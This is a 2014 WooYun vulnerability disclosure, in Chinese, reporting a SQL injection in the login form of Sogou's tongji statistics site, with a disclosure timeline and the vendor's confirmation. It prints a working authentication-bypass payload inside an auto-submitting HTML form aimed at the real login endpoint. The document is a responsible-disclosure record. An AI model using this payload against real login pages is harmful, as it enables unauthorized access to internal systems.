2014-05-01:细节已通知厂商并且等待厂商处理中
2014-05-04:厂商已经确认,细节仅向厂商公开
2014-05-14:细节向核心白帽子及相关领域专家公开
2014-05-24:细节向普通白帽子公开
2014-06-03:细节向实习白帽子公开
2014-06-15:细节向公众公开
听说开了SGSRC啊。来wooyun支持下。
详细说明:问题出在:
http://tongji.sogou.com/
登录表单username存在sql盲注入。
构造如下表单即可登录进后台:
<form action="http://tongji.sogou.com/login_login.action" method="post" name="wutongyu" id="wutongyu">
<input type="text" name="username" value="-1' OR 1=1 AND 1=1 --"/>
</form>
<script>
document.wutongyu.submit();
</script>
成功以sogou内部人员的身份登录平台:
修复方案:
过滤username字段。
版权声明:转载请注明来源 梧桐雨@乌云 漏洞回应 厂商回应:危害等级:高
漏洞Rank:15
确认时间:2014-05-04 11:38
厂商回复:收到,感谢支持,欢迎到SGSRC(http://)提交漏洞。
最新状态:暂无